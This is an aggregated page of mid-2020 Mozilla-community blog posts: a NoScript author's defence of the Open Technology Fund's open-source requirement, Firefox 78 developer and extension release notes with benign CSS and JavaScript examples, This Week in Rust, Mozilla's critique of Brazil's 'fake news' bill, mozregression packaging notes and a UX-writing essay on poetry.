As the readers of this blog almost surely know, I'm the author of NoScript, a web browser security enhancer which can be installed on Firefox and Chrome, and comes built-in with the Tor Browser.

NoScript has received support by the Open Technology Fund (OTF) for specific development efforts: especially, to make it cross-browser, better internationalized and ultimately serving a wider range of users.

OTF's mission is supporting technology to counter surveillance and censorship by repressive regimes and foster Internet Freedom. One critical and strict requirement, for OTF to fund or otherwise help software projects, is them being licensed as Free/Libre Open Source Software (FLOSS), i.e. their code being publicly available for inspection, modification and reuse by anyone. Among the successful projects funded by OTF, you may know or use Signal, Tor, Let's Encrypt, Tails, QubeOS, Wireshark, OONI, GlobaLeaks, and millions of users all around the world, no matter their political views, trust them because they are FLOSS, making vulnerabilities and even intentionally malicious code harder to hide.

Now this virtuous modus operandi is facing an existential threat, started when the whole OTF leadership has been fired and replaced by Michael Pack, the controversial new CEO of th U.S. Agency for Global Media (USAGM), the agency OTF reports to.

Lobbying documents emerged on the eve of former OTF CEO Libby Liu's defenestration, strongly suggesting this purge preludes a push to de-fund FLOSS, and especially "p2p, privacy-first" tools, in favor of large scale, centralized and possibly proprietary "alternatives": two closed source commercial products are explicitly named among the purportedly best recipients of funding.

Beside the weirdness of seeing "privacy-first" used as a pejorative when talking about technologies protecting journalists and human rights defenders from repressive regimes such as Iran or People's Republic of China (even more now, while the so called "Security Law" is enforced against Hong Kong protesters), I find very alarming the lack of recognition for the radical importance of the tools being open source to be trusted by their users, no matter the country or the fight they're in, when their lives are at risk.

Talking of my own experience (but I'm confident most other successful and effective OTF-funded software projects have similar stories to tell): I've been repeatedly approached by law enforcement representatives from different countries (including PRC) - and also by less "formal" groups - with a mix of allegedly noble reasons, interesting financial incentives and veiled threats, to put ad-hoc backdoors in NoScript. I could deny all such requests not because of any exceptional moral fiber of mine, even though being part of the "OTF community", where the techies who build the tools meet the human rights activists who use them on the field, helped me growing awareness of my responsibilities. I could say "no" just because NoScript being FLOSS made it impractical/suicidal: everyone, looking at the differences in the source code, could spot the backdoor, and I would loose any credibility as a security software developer. NoScript would be forked, in the best case scenario, or dead.

The strict FLOSS requirement is only one of the great features in OTF's transparent, fair, competitive and evidence-based award process, but I believe it's the best assurance we can actually trust our digital freedom tools.

I'm aware of (very few) other organizations and funds adopting similar criteria, and likely managing larger budgets too, especially in Europe: so if USA really decides to give up their leadership in the Internet Freedom space, NoScript and other tools such as Tor, Tails or OONI would still have a door to knock at.

But none of these entities, AFAIK, own OTF's "secret sauce": bringing together technologists and users in a unique, diverse and inclusive community of caring humans, where real and touching stories of oppression and danger are shared in a safe space, and help shape effective technology which can save lives.

So please, do your part to save Internet Freedom, save OTF, save trust.

Dzmitry MalyshauMissing structure in technical discussions

People are amazing creatures. When discussing a complex issue, they are able to keep multiple independent arguments in their heads, the pieces of supporting and disproving evidence, and can collapse this system into a concrete solution. We can spend hours navigating through the issue comments on Github, reconstructing the points of view, and making sense of the discussion. Problem is: we don’t actually want to apply this superpower and waste time nearly as often.

Problem with technical discussions

Have you heard of async in Rust? Ever wondered why the core team opted into a completely new syntax for this feature? Let’s dive in and find out! Here is #57640 with 512 comments, kindly asking everyone to check #50547 (with just 308 comments) before expressing their point of view. Following this discussion must have been exhausting. I don’t know how it would be possible to navigate it without the summary comments.

Another example is the loop syntax in WebGPU. Issue #569 has only 70 comments, with multiple attempts to summarize the discussion in the middle. It would probably take a few hours at the minimum to get a gist of the group reasoning for somebody from the outside. And that doesn’t include the call transcripts.

Github has emojis which allow certain comments to show more support. Unfortunately, our nature is such that comments are getting liked when we agree with them, not when they advance the discussion in a constructive way. They are all over the place and don’t really help.

What would help though is having a non-linear structure for the discussion. Trees! They make following HN and Reddit threads much easier, but they too have problems. Sometimes, a really important comment is buried deep in one of the branches. Plus, trees don’t work well for a dialog, when there is some back-and-forth between people.

That brings us to the point: most technical discussions are terrible. Not in a sense that people can’t make good points and progress through it, but rather that there is no structure to a discussion, and it’s too hard to follow. What I see in reality is a lot of focus from a very few dedicated people, and delegation by the other ones to those focused. Many views get misrepresented, and many perspectives never heard, because the flow of comments quickly filters out most potential participants.

Structured discussion

My first stop in the search of a solution was on Discourse. It is successfully used by many communities, including Rust users. Unfortunately, it still has linear structure, and doesn’t bring a lot to the table on top of Github. Try following this discussion about Rust in 2020 for example.

Then I looked at platforms designed specifically for a structured argumentation. One of the most popular today is Kialo. I haven’t done a good evaluation on it, but it seemed that Kialo isn’t targeted at engineers, and it’s a platform that we’d have to register in for use. Wishing to use Markdown with a system like that, I stumbled upon Argdown, and realized that it concluded my search.

Argdown introduces a syntax for defining the structure of an argument in text. Statements, arguments, propositions, conclusions - it has it all, written simply in your text editor (especially if its VSCode, for which there is a plugin), or in the playground. It has command-line tools to produce all sorts of derivatives, like dot graphs, web components, JSON, you name it, from an .argdown file. Naturally, formatting with Markdown in it is also supported.

That discovery led me to two questions. (1) - what would an existing debate look like in such a system? And (2) - how could we shift the workflow towards using one?

So I picked the most contentious topic in WebGPU discussions and tried to reconstruct it. Topic was about choosing the shading language, and why SPIR-V wasn’t accepted. It was discussed by the W3C group over the course of 2+ years, and it’s evident that there is some misunderstanding of why the decision was made to go with WGSL, taking Google’s Tint proposal as a starting point.

I attempted to reconstruct the debate in https://github.com/kvark/webgpu-debate, building the SPIR-V.argdown with the first version of the argumentation graph, solving (1). The repository accepts pull requests that are checked by CI for syntax correctness, inviting everyone to collaborate, solving (2). Moreover, the artifacts are automatically uploaded to Github-pages, rendering the discussion in a way that is easy to explore.

Way forward

I’m excited to have this new way of preserving and growing the structure of a technical debate. We can keep using the code hosting platforms, and arguing on the issues and PR, while solidifying the core points in these .argdown files. I hope to see it applied more widely to the workflows of technical working groups.

Hacks.Mozilla.OrgNew in Firefox 78: DevTools improvements, new regex engine, and abundant web platform updates

A new stable Firefox version rolls out today, providing new features for web developers. A new regex engine, updates to the ECMAScript Intl API, new CSS selectors, enhanced support for WebAssembly, and many improvements to the Firefox Developer Tools await you.

This blog post provides merely a set of highlights; for all the details, check out the following:

Developer tool improvements

Source-mapped variables, now also in Logpoints

With our improvements over the recent releases, debugging your projects with source maps will feel more reliable and faster than ever. But there are more capabilities that we can squeeze out of source maps. Did you know that Firefox’s Debugger also maps variables back to their original name? This especially helps babel-compiled code with changed variable names and added helper variables. To use this feature, pause execution and enable the “Map” option in the Debugger’s “Scopes” pane.

As a hybrid between the worlds of the DevTools Console and Debugger, Logpoints make it easy to add console logs to live code–or any code, once you’ve added them to your toolbelt. New in Firefox 75, original variable names in Logpoints are mapped to the compiled scopes, so references will always work as expected.

Using variable mapping and logpoints in Debugger

To make mapping scopes work, ensure that your source maps are correctly generated and include enough data. In Webpack this means avoid the “cheap” and “nosources” options for the “devtools” configuration.

Promises and frameworks error logs get more detailed

Uncaught promise errors are critical in modern asynchronous JavaScript, and even more so in frameworks like Angular. In Firefox 78, you can expect to see all details for thrown errors show up properly, including their name and stack:

Before/after comparison for improved error logs

The implementation of this functionality was only possible through the close collaboration between the SpiderMonkey engineering team and a contributor, Tom Schuster. We are investigating how to improve error logging further, so please let us know if you have suggestions.

Monitoring failed request issues

Failed or blocked network requests come in many varieties. Resources may be blocked by tracking protection, add-ons, CSP/CORS security configurations, or flaky connectivity, for example. A resilient web tries to gracefully recover from as many of these cases as possible automatically, and an improved Network monitor can help you with debugging them.

Failed and blocked requests are annotated with additional reasons

Firefox 78 provides detailed reports in the Network panel for requests blocked by Enhanced Tracking Protection, add-ons, and CORS.

Quality improvements

Faster DOM navigation in Inspector

Inspector now opens and navigates a lot faster than before, particularly on sites with many CSS custom properties. Some modern CSS frameworks were especially affected by slowdowns in the past. If you see other cases where Inspector isn’t as fast as expected, please report a performance issue. We really appreciate your help in reporting performance issues so that we can keep improving.

Remotely navigate your Firefox for Android for debugging

Remote debugging’s new navigation elements make it more seamless to test your content for mobile with the forthcoming new edition of Firefox for Android. After hooking up the phone via USB and connecting remote debugging to a tab, you can navigate and refresh pages from your desktop.

Early-access DevTools features in Developer Edition

Developer Edition is Firefox’s pre-release channel. You get early access to tooling and platform features. Its settings enable more functionality for developers by default. We like to bring new features quickly to Developer Edition to gather your feedback, including the following highlights.

Async stacks in Console & Debugger

We’ve built new functionality to better support async stacks in the Console and Debugger, extending stacks with information about the events, timers, and promises that lead the execution of a specific line of code. We have been improving asynchronous stacks for a while now, based on early feedback from developers using Firefox DevEdition. In Firefox 79, we expect to enable this feature across all release channels.

Async stacks add promise execution for both Console and Debugger

Console shows failed requests

Network requests with 4xx/5xx status codes now log as errors in the Console by default. To make them easier to understand, each entry can be expanded to view embedded network details.

Server responses with 4xx/5xx status responses logged in the Console

Web platform updates

New CSS selectors :is and :where

Version 78 sees Firefox add support for the :is() and :where() pseudo-classes, which allow you to present a list of selectors to the browser. The browser will then apply the rule to any element that matches one of those selectors. This can be useful for reducing repetition when writing a selector that matches a large number of different elements. For example:

header p, main p, footer p,
header ul, main ul, footer ul { … }

Can be cut down to

:is(header, main, footer) :is(p, ul) { … }

Note that :is() is not particularly a new thing—it has been supported for a while in various browsers. Sometimes this has been with a prefix and the name any (e.g. :-moz-any). Other browsers have used the name :matches(). :is() is the final standard name that the CSSWG agreed on.

:is() and :where() basically do the same thing, but what is the difference? Well, :is() counts towards the specificity of the overall selector, taking the specificity of its most specific argument. However, :where() has a specificity value of 0 — it was introduced to provide a solution to the problems found with :is() affecting specificity.

What if you want to add styling to a bunch of elements with :is(), but then later on want to override those styles using a simple selector? You won’t be able to because class selectors have a higher specificity. This is a situation in which :where() can help. See our :where() example for a good illustration.

Styling forms with CSS :read-only and :read-write

At this point, HTML forms have a large number of pseudo-classes available to style inputs based on different states related to their validity — whether they are required or optional, whether their data is valid or invalid, and so on. You can find a lot more information in our UI pseudo-classes article.

In this version, Firefox has enabled support for the non-prefixed versions of :read-only and :read-write. As their name suggests, they style elements based on whether their content is editable or not:

input:read-only, textarea:read-only {
  border: 0;
  box-shadow: none;
  background-color: white;
}

textarea:read-write {
  box-shadow: inset 1px 1px 3px #ccc;
  border-radius: 5px;
}

(Note: Firefox has supported these pseudo-classes with a -moz- prefix for a long time now.)

You should be aware that these pseudo-classes are not limited to form elements. You can use them to style any element based on whether it is editable or not, for example a <p> element with or without contenteditable set:

p:read-only {
  background-color: red;
  color: white;
}

p:read-write {
  background-color: lime;
}

New regex engine

Thanks to the RegExp engine in SpiderMonkey, Firefox now supports all new regular expression features introduced in ECMAScript 2018, including lookbehinds (positive and negative), the dotAll flag, Unicode property escapes, and named capture groups.

Lookbehind and negative lookbehind assertions make it possible to find patterns that are (or are not) preceded by another pattern. In this example, a negative lookbehind is used to match a number only if it is not preceded by a minus sign. A positive lookbehind would match values not preceded by a minus sign.

'1 2 -3 0 -5'.match(/(?<!-)\d+/g);
// → Array [ "1", "2", "0" ]

'1 2 -3 0 -5'.match(/(?<=-)\d+/g);
// → Array [ "3", "5" ]

Unicode property escapes are written in the form \p{…} and \{…}. They can be used to match any decimal number in Unicode, for example. Here’s a unicode-aware version of \d that matches any Unicode decimal number instead of just the ASCII numbers 0-9.

const regex = /^\p{Decimal_Number}+$/u;

Named capture groups allow you to refer to a certain portion of a string that a regular expression matches, as in:

let re = /(?<year>\d{4})-(?<month>\d{2})-(?<day>\d{2})/u;
let result = re.exec('2020-06-30');
console.log(result.groups);
// → { year: "2020", month: "06", day: "30" }

ECMAScript Intl API updates

Rules for formatting lists vary from language to language. Implementing your own proper list formatting is neither straightforward nor fast. Thanks to the new Intl.ListFormat API, the JavaScript engine can now format lists for you:

const lf = new Intl.ListFormat('en');
lf.format(["apples", "pears", "bananas"]):
// → "apples, pears, and bananas"

const lfdis = new Intl.ListFormat('en', { type: 'disjunction' });
lfdis.format(["apples", "pears", "bananas"]):
// → "apples, pears, or bananas"

Enhanced language-sensitive number formatting as defined in the Unified NumberFormat proposal is now fully implemented in Firefox. See the NumberFormat constructor documentation for the new options available.

ParentNode.replaceChildren

Firefox now supports ParentNode.replaceChildren(), which replaces the existing children of a Node with a specified new set of children. This is typically represented as a NodeList, such as that returned by Document.querySelectorAll().

This method provides an elegant way to empty a node of children, if you call replaceChildren() with no arguments. It also is a nice way to shift nodes from one element to another. For example, in this case, we use two buttons to transfer selected options from one <select> box to another:

const noSelect = document.getElementById('no');
const yesSelect = document.getElementById('yes');
const noBtn = document.getElementById('to-no');
const yesBtn = document.getElementById('to-yes');
yesBtn.addEventListener('click', () => {
  const selectedTransferOptions = document.querySelectorAll('#no option:checked');
  const existingYesOptions = document.querySelectorAll('#yes option');
  yesSelect.replaceChildren(...selectedTransferOptions, ...existingYesOptions);
});

noBtn.addEventListener('click', () => {
  const selectedTransferOptions = document.querySelectorAll('#yes option:checked');
  const existingNoOptions = document.querySelectorAll('#no option');
  noSelect.replaceChildren(...selectedTransferOptions, ...existingNoOptions);
});

You can see the full example at ParentNode.replaceChildren().

WebAssembly multi-value support

Multi-value is a proposed extension to core WebAssembly that enables functions to return many values, and enables instruction sequences to consume and produce multiple stack values. The article Multi-Value All The Wasm! explains what this means in greater detail.

WebAssembly large integer support

WebAssembly now supports import and export of 64-bit integer function parameters (i64) using BigInt from JavaScript.

WebExtensions

We’d like to highlight three changes to the WebExtensions API for this release:

  • When using proxy.onRequest, a filter that limits based on tab id or window id is now correctly applied. This is useful for add-ons that want to provide proxy functionality in just one window.
  • Clicking within the context menu from the “all tabs” dropdown now passes the appropriate tab object. In the past, the active tab was erroneously passed.
  • When using downloads.download with the saveAs option, the recently used directory is now remembered. While this data is not available to developers, it is very convenient to users.

TLS 1.0 and 1.1 removal

Support for the Transport Layer Security (TLS) protocol’s version 1.0 and 1.1, has been dropped from all browsers as of Firefox 78 and Chrome 84. Read TLS 1.0 and 1.1 Removal Update for the previous announcement and what actions to take if you are affected.

Firefox 78 is an ESR release

Firefox follows a rapid release schedule: every four weeks we release a new version of Firefox.

In addition to that, we provide a new Extended Support Release (ESR) for enterprise users once a year. Firefox 78 ESR includes all of the enhancements since the last ESR (Firefox 68), along with many new features to make your enterprise deployment easier.

A noteworthy feature: In previous ESR versions, Service workers (and the Push API) were disabled. Firefox 78 is the first ESR release to support them. If your enterprise web application uses AppCache to provide offline support, you should migrate to these new APIs as soon as possible as AppCache will not be available in the next major ESR in 2021.

Firefox 78 is the last supported Firefox version for macOS users of OS X 10.9 Mavericks, OS X 10.10 Yosemite and OS X 10.11 El Capitan. These users will be moved to the Firefox ESR channel by an application update. For more details, see the Mozilla support page.

See also the release notes for Firefox for Enterprise 78.

The post New in Firefox 78: DevTools improvements, new regex engine, and abundant web platform updates appeared first on Mozilla Hacks - the Web developer blog.

This Week In RustThis Week in Rust 345

Hello and welcome to another issue of This Week in Rust! Rust is a systems language pursuing the trifecta: safety, concurrency, and speed. This is a weekly summary of its progress and community. Want something mentioned? Tweet us at @ThisWeekInRust or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Check out this week's This Week in Rust Podcast

Updates from Rust Community

News & Blog Posts

Crate of the Week

This week's crate is print_bytes, a library to print arbitrary bytes to a stream as losslessly as possible.

Thanks to dylni for the suggestion!

Submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but didn't know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from Rust Core

339 pull requests were merged in the last week

Rust Compiler Performance Triage

  • 2020-06-30. Three regressions, two of them on rollups; two improvements, one on a rollup.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs

New RFCs

Upcoming Events

Online
North America
Asia Pacific

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Rust Jobs

Tweet us at @ThisWeekInRust to get your job offers listed here!

Quote of the Week

References are a sharp tool and there are roughly three different approaches to sharp tools.

  1. Don't give programmers sharp tools. They may make mistakes and cut their fingers off. This is the Java/Python/Perl/Ruby/PHP... approach.
  2. Give programmers all the sharp tools they want. They are professionals and if they cut their fingers off it's their own fault. This is the C/C++ approach.
  3. Give programmers sharp tools, but put guards on them so they can't accidentally cut their fingers off. This is Rust's approach.

Lifetime annotations are a safety guard on references. Rust's references have no sychronization and no reference counting -- that's what makes them sharp. References in category-1 languages (which typically do have synchronization and reference counting) are "blunted": they're not really quite as effective as category-2 and -3 references, but they don't cut you, and they still work; they might just slow you down a bit.

So, frankly, I like lifetime annotations because they prevent me from cutting my fingers off.

trentj on rust-users

Thanks to Ivan Tham for the suggestions!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, and cdmistman.

Discuss on r/rust

Mozilla Open Policy & Advocacy BlogBrazil’s fake news law will harm users

The “fake news” law being rushed through Brazil’s Senate will massively harm privacy and freedom of expression online. Among other dangerous provisions, this bill would force traceability of forwarded messages, which will require breaking end-to-end encryption. This legislation will substantially harm online security, while entrenching state surveillance.

Brazil currently enjoys some of the most comprehensive digital protections in the world, via its Internet Bill of Rights and the upcoming data protection law is poised to add even more protections. In order to preserve these rights, the ‘fake news’ law should be immediately withdrawn from consideration and be subject to rigorous congressional review with input from all affected parties.

The post Brazil’s fake news law will harm users appeared first on Open Policy & Advocacy.

William Lachancemozregression GUI: now available for Linux

Thanks to @AnAverageHuman, mozregression once again has an easy to use and install GUI version for Linux! This used to work a few years ago, but got broken with some changes in the mozregression-python2 era and didn’t get resolved until now:

This is an area where using telemetry in mozregression can help us measure the impact of a change like this: although Windows still dominates in terms of marketshare, Linux is very widely used by contributors — of the usage of mozregression in the past 2 months, fully 30% of the sessions were on Linux (and it is possible we were undercounting that due to bug 1646402):

link to query (internal-only)

It will be interesting to watch the usage numbers for Linux evolve over the next few months. In particular, I’m curious to see what percentage of users on that platform prefer a GUI.

Appendix: reducing mozregression-GUI’s massive size

One thing that’s bothered me a bunch lately is that the mozregression GUI’s size is massive and this is even more apparent on Linux, where the initial distribution of the GUI came in at over 120 megabytes! Why so big? There were a few reasons:

  1. PySide2 (the GUI library we use) is very large (10s of megabytes), and PyInstaller packages all of it by default into your application distribution.
  2. The binary/rust portions of the Glean Python SDK were been built with debugging information included (basically as a carry-over when it was a pre-alpha product), which made it 38 megabytes big (!) on Linux.
  3. On Linux at least, a large number of other system libraries are packaged into the distribution.

A few aspects of this were under our control: Ian Moody (:Kwan) and myself crafted a script to manually remove unneeded PySide2 libraries as part of the packaging process. The Glean team was awesome-as-always and quickly rebuilt Glean without debugging information (this was basically an oversight). Finally, I managed to shave off a few more megabytes by reverting the Linux build to an earlier version of Ubuntu (Xenial), which is something I had been meaning to do anyway.

Even after doing all of these things, the end result is still a little underwhelming: the mozregression GUI distribution on Linux is still 79.5 megabytes big. There are probably other things we could do, but we’re definitely entering the land of diminishing returns.

Honestly, my main takeaway is just not to build an application like this in Python unless you absolutely have to (e.g. you’re building an application which needs system-level access). The web is a pretty wonderful medium for creating graphical applications these days, and by using it you sidestep these type of installation issues.

Mozilla Addons BlogExtensions in Firefox 78

In Firefox 78, we’ve done a lot of the changes under the hood. This includes preparation for changes coming up in Firefox 79, improvements to our tests, and improvements to make our code more resilient. There are three things I’d like to highlight for this release:

  • When using proxy.onRequest, a filter that limits based on tab ID or window ID is now correctly applied. We’ve also greatly improved the performance of these filters. This could be useful for add-ons that want to provide proxy functionality in just one window.
  • Clicking within the context menu from the “all tabs” dropdown now passes the appropriate tab object. In the past, the active tab was erroneously passed.
  • When using downloads.download with the saveAs option set to true, the recently used directory is now remembered on a per-extension basis. For example, a user of a video downloader would benefit from not having to navigate to their videos folder every time the extension offers a file to download.

These and other changes were brought to you by Atique Ahmed Ziad, Tom Schuster, Mark Smith, as well as various teams at Mozilla. A big thanks to everyone involved in the subtle but important changes to WebExtensions in Firefox.

The post Extensions in Firefox 78 appeared first on Mozilla Add-ons Blog.

Mozilla Open Policy & Advocacy BlogMozilla’s analysis: Brazil’s fake news law harms privacy, security, and free expression

UPDATE: On 30 June 2020, the Brazilian Senate passed “PLS 2630/2020” (the fake news law) with some key amendments that made government identity verification for accounts optional, excluded social media networks from the mandatory traceability provision (while keeping this requirement in place for messaging services like Signal and Whats App) and some other scope related changes. All the other concerns highlighted below remain a part of the bill passed by the Senate. Additionally, Article 37 of the law mandates that social networks and private messaging apps must appoint legal representatives in Brazil with the power to remotely access to user databases/logs. This pseudo data localization measure poses massive privacy concerns while undermining the due process protections provided by US laws such as the CLOUD Act and Electronic Communications Privacy Act. Both of these laws require US providers to satisfy certain procedural safeguards before turning over private data to foreign law enforcement agents.

The law will now move to the Chamber of Deputies, the lower house of the National Congress in Brazil, for debate and passage. The changes made to the law since the introduction of its most regressive version on June 25 showcase that while there have been some improvements (in the face of widespread criticism), many dangerous provisions remain. We remain committed to engaging with Brazilian policymakers to resolve the underlying issues while protecting privacy, security, and freedom of expression. Local civil society Coalizão Direitos na Rede have been very influential in the debate so far, should be consulted as the bill moves to the Chamber of Deputies, and are a good source of information about what’s happening.


Original Post from 29 June 2020

While fake news is a real problem, the Brazilian Law of Freedom, Liability, and Transparency on the Internet (colloquially referred to as the “fake news law”) is not a solution. This hastily written legislation — which could be approved by the Senate as soon as today — represents a serious threat to privacy, security, and free expression. The legislation is a major step backwards for a country that has been hailed around the world for its landmark Internet Civil Rights Law (Marco Civil) and its more recent data protection law.

Substantive concerns

While this bill poses many threats to internet health, we are particularly concerned by the following provisions:

Breaking end-to-end encryption: According to the latest informal congressional report, the law would mandate all communication providers to retain records of forwards and other forms of bulk communications, including origination, for a period of three months. As companies are required to report much of this information to the government, in essence, this provision would create a perpetually updating, centralized log of digital interactions of nearly every user within Brazil. Apart from the privacy and security risks such a vast data retention mandate entails, the law seems to be infeasible to implement in end-to-end encrypted services such as Signal and WhatsApp. This bill would force companies to leave the country or weaken the technical protections that Brazilians rely on to keep their messages, health records, banking details, and other private information secure.

Mandating real identities for account creation: The bill also broadly attacks anonymity and pseudonymity. If passed, in order to use social media, Brazilian users would have to verify their identity with a phone number (which itself requires government ID in Brazil), and foreigners would have to provide a passport. The bill also requires telecommunication companies to share a list of active users (with their cellphone numbers) to social media companies to prevent fraud. At a time when many are rightly concerned about the surveillance economy, this massive expansion of data collection and identification seems particularly egregious. Just weeks ago, the Brazilian Supreme Court held that mandatory sharing of subscriber data by telecom companies was illegal, making such a provision legally tenuous.

As we have stated before, such a move would be disastrous for the privacy and anonymity of internet users while also harming inclusion. This is because people coming online for the first time (often from households with just one shared phone) would not be able to create an email or social media account without a unique mobile phone number.

This provision would also increase the risk from data breaches and entrench power in the hands of large players in the social media space who can afford to build and maintain such large verification systems. There is no evidence to prove that this measure would help fight misinformation (its motivating factor), and it ignores the benefits that anonymity can bring to the internet, such as whistleblowing and protection from stalkers.

Vague Criminal Provisions: The draft version of the law over the past week has additional criminal provisions that make it illegal to:

  • create or share content that poses a serious risk to “social peace or to the economic order” of Brazil, with neither term clearly defined, OR
  • be a member of an online group knowing that its primary activity is sharing defamatory messages.

These provisions, which might be modified in the subsequent drafts based on widespread opposition, would clearly place untenable, subjective restrictions on the free expression rights of Brazilians and have a chilling effect on their ability to engage in discourse online. The draft law also contains other concerning provisions surrounding content moderation, judicial review, and online transparency that pose significant challenges for freedom of expression.

Procedural concerns, history, and next steps

This legislation was nominally first introduced into the Brazilian Congress in April 2020. However, on June 25, a radically different and substantially more dangerous version of the bill was sprung on Senators mere hours ahead of being put to a vote. This led to push back from Senators, who asked for more time to pursue the changes, accompanied by widespread international condemnation from civil society groups.

Thanks to concentrated push back from civil society groups such as the Coalizão Direitos na Rede, some of the most drastic changes in the June 25 draft (such as data localisation and the blocking of non-compliant services) have now been informally dropped by the Rapporteur who is still pushing for the law to be passed as soon as possible. Despite these improvements, the most worrying proposals remain, and this legislation could pass the Senate as soon as tomorrow, 30 June 2020.

Next steps

We urge Senator Angelo Coronel and the Brazilian Senate to immediately withdraw this bill, and hold a rigorous public consultation on the issues of misinformation and disinformation before proceeding with any legislation. The Commission on Constitution, Justice, and Citizenship in the Senate remains one of the best avenues for such a review to take place, and should seek the input of all affected stakeholders, especially civil society. We remain committed to working with the government to address these important issues, but not at the cost of Brazilians’ privacy, security, and free expression.

The post Mozilla’s analysis: Brazil’s fake news law harms privacy, security, and free expression appeared first on Open Policy & Advocacy.

Firefox UXThe Poetics of Product Copy: What UX Writers Can Learn From Poetry

Two excerpts appear side-by-side to create a comparison. On the left, an excerpt of the poem “This Is Just To Say” by William Carlos Williams: "Forgive me / they were delicious / so sweet/ and so cold." On the right, an excerpt of a Firefox error message that reads, "Sorry. We're having trouble getting your pages back. We are having trouble restoring your last browsing session. Select Restore Session to try again."

Excerpts: “This Is Just To Say” by William Carlos Williams and a Firefox error message

 

Word nerds make their way into user experience (UX) writing from a variety of professional backgrounds. Some of the more common inroads are journalism and copywriting. Another, perhaps less expected path is poetry.

I’m a UX content strategist, but I spent many of my academic years studying and writing poetry. As it turns out, those years weren’t just enjoyable — they were useful preparation for designing product copy.

Poetry and product copy wrestle with similar constraints and considerations. They are each often limited to a small amount of space and thus require an especially thoughtful handling of language that results in a particular kind of grace.

While the high art of poetry and the practical, business-oriented work of UX are certainly not synonymous, there are some key parallels to learn from as a practicing content designer.


1. Both consider the human experience closely

Poets look closely at the human experience. We use the details of the personal to communicate a universal truth. And how that truth is communicated — the context, style, and tone — reflect the culture and moment in time. When a poem makes its mark, it hits a collective nerve.

The poem “Tired” by Langston Hughes floats in a white box: "I am so tired of waiting. Aren’t you, for the world to become good and beautiful and kind? Let us take a knife and cut the world in two — and see what worms are eating at the rind.”

“Tired” by Langston Hughes

 

Like poetry, product copy looks closely at the human experience, and its language reflects the culture from which it was born. As technology has become omnipresent in our lives, the language of the interface has, in turn, become more conversational. “404 Not Found” messages are (ideally) replaced with plain language. Emojis and Hmms are sprinkled throughout the digital experience, riding the tide of memes and tweets that signify an increasingly informal culture. You can read more about the relationship between technology and communication in Erika Hall’s seminal work, Conversational Design.

While the topic at hand is often considerably less exalted than that of poetry, a UX writer similarly considers the details of a moment in time. Good copy is informed by what the user is experiencing and feeling — the frustration of a failed page load or the success of a saved login — and crafts content sensitive to that context.

Product copy strikes the wrong note when it fails to be empathetic to that moment. For example, it’s unhelpful to use technical jargon or make a clever joke when a user encounters a dead end. This insensitivity is made more acute if the person is using the interface to navigate a stressful life event, like filing for leave when a loved one is ill. What they need in that moment is plain language and clear instructions on a path forward.


2. They make sense of complexity with language

Poetry helps us make sense of complexity through language. We turn to poetry to feel our way through dark times — the loss of a loved one or a major illness — and to commemorate happy times — new love, the beauty of the natural world. Poetry finds the words to help us understand an experience and (hopefully) move forward.

Excerpt of the poem, "Toad," by Diane Seuss floats in a white box: "The grief, when I finally contacted it decades later, was black, tarry, hot, like the yarrow-edged side roads we walked barefoot in the summer."

Excerpt: “Toad” by Diane Seuss

<figcaption class="imageCaption"></figcaption>

 

UX writers also use the building blocks of language to help a user move forward and through an experience. UX writing requires a variety of skills, including the ability to ask good questions, to listen well, to collaborate, and to conduct research. The foundational skill, however, is using language to bring clarity to an experience. Words are the material UX writers use to co-create experiences with designers, researchers, and developers.

Screenshot of the modal which allows a user to identify the issue they are having with an extension. Clipped image displays three possible reasons with examples, including "It claims to be something it's not," "I never wanted it and don’t know how to get rid of it," and "It contains hateful, violent, or illegal content."

Excerpt of a screen for Firefox users to report an issue with a browser extension. The flow enables the user to report an extension, troubleshoot issues, and remove the extension. Co-created with designer Philip Walmsley.


3. Words are selected carefully within a small canvas

“Poetry is your best source of deliberate intentional language that has nothing to do with your actual work. Reading it will descale your mind, like vinegar in a coffee maker.” — Conversational Design, Erika Hall

Poetry considers word choice carefully. And, while poetry takes many forms and lengths, its hallmark is brevity. Unlike a novel, a poem can begin and end on one page, or even a few words. The poet often uses language to get the reader to pause and reflect.

Product copy should help users complete tasks. Clarity trumps conciseness, but we often find that fewer words — or no words at all — are what the user needs to get things done. While we will include additional language and actions to add friction to an experience when necessary, our goal in UX writing is often to get out of the user’s way. In this way, while poetry has a slowing function, product copy can have a streamlining function.

Working within these constraints requires UX writers to also consider each word very carefully. A button that says “Okay!” can mean something very different, and has a different tone, than a button that says, “Submit.” Seemingly subtle changes in word choice or phrasing can have a big impact, as they do in poetry.

Two screenshots, side-by-side, of a doorhannger in Firefox that promotes the "Pin Tab" feature. Includes header, body copy, illustration of the feature, and primary and secondary buttons. Lay-out is consistent between the two but there are slight changes in body copy.

Left: Early draft of a recommendation panel for the Firefox Pin Tab feature. Right: final copy, which does not include the descriptors “tap strip” or “tab bar” because users might not be familiar with these terms. A small copy change like using “open in a tab” instead of “tab strip” can have a big impact on user comprehension. Co-created with designer Amy Lee.


4. Moment and movement

Reading a poem can feel like you are walking into the middle of a conversation. And you have — the poet invites you to reflect on a moment in time, a feeling, a place. And yet, even as you pause, poetry has a sense of moment — metaphor and imagery connect and build quickly in a small amount of space. You tumble over one line break on to the next.

Excerpt of the poem, "Bedtime Story," by Franny Choi, floats in a white box. Every other line is heavily indented line to give it a sense of movement: "Outside, cicadas threw their jagged whines into the dark. Inside, three children, tucked in our mattresses flat as rice cakes against the floor. Pink quilts, Mickey Mouse cotton – why is it that all my childhood comforts turn out to be imperialism’s drippings?"

Excerpt: “Bedtime Story” by Franny Choi

<figcaption class="imageCaption"></figcaption>

 

Product copy captures a series of moments in time. But, rather than walking into a conversation, you are initiating it and participating in it. One of the hallmarks of product copy, in contrast to other types of professional writing, is its movement — you aren’t writing for a billboard, but for an interface that is responsive and conditional.

